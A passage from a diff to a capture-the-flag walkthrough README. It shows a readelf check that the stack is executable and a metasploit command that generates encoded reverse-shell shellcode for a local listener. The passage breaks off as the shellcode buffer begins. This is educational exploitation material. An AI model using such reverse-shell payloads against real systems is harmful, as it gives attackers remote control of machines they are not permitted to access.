Nildram/cyber-challenge-walkthrough/README.md

   GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
 ```

 The `RWE` output tells us that the stack is readable, writable and executable so we're free to go ahead and use the stack to host our shellcode.
-Now let's go ahead and generate some shellcode for a reverse shell using metasploit (be sure to set the correct LHOST and LPORT for your own machine):
+Now let's go ahead and generate some shellcode for a reverse shell using metasploit (be sure to update LHOST and LPORT as necessary):

 ```
-root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.94.133 PORT=4444 R |
-msfencode -b '\x0a\x04' -e x86/shikata_ga_nai -t c
+root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 PORT=4444 R | msfencode -b '\x0a\x04' -e x86/shikata_ga_nai -t c
 [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

 unsigned char buf[] =